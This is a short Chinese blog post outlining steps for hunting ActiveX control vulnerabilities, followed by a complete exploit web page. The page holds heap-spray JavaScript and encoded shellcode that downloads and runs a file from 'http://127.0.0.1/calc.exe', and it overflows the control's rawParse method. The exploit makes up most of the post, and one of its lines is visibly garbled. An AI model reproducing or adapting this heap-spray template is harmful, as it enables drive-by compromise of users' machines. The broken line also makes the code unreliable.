ActiveX漏洞挖掘思路

   最近关于ActiveX控件漏洞猛报,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下载并安装欲测试的软件
(2)使用COM Explorer软件查看ActiveX控件的各种属性
(3)通过VS2005对象浏览器查看控件中的变量、函数、函数参数,从中寻找可能存在漏洞的参数。
(4)进行漏洞的测试
(5)编写漏洞利用网页
网页大致内容如下:
  1. <html>  
  2. <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>  
  3. <body>  
  4. <SCRIPT language="javascript">  
  5.     var shellcode = unescape("%u9090"+"%u9090"+   
  6. "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +   
  7. 。。。。。。(省略)   
  8. "%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +   
  9. "%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");   
  10. </script>  
  11. <SCRIPT language="javascript">  
  12. var bigblock = unescape("%u9090%u9090");   
  13. var headersize = 20;   
  14. var slackspace = headersize+shellcode.length;   
  15. while (bigblock.length<slackspace) bigblock+=bigblock;   
  16. fillblock = bigblock.substring(0, slackspace);   
  17. block = bigblock.substring(0, bigblock.length-slackspace);   
  18. while(block.length+slackspace<0x40000blockblock = block+block+fillblock;   
  19. memory = new Array();   
  20. for (x=0; x<300; x++) memory[x] = block + shellcode;   
  21. var buffer = '';   
  22. while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";   
  23. target.rawParse(buffer);   
  24. </script>  
  25. </body>  
  26. </html>  
 

本文出自 “simeon技术专栏” 博客,谢绝转载!

你可能感兴趣的:(漏洞,职场,ActiveX,休闲)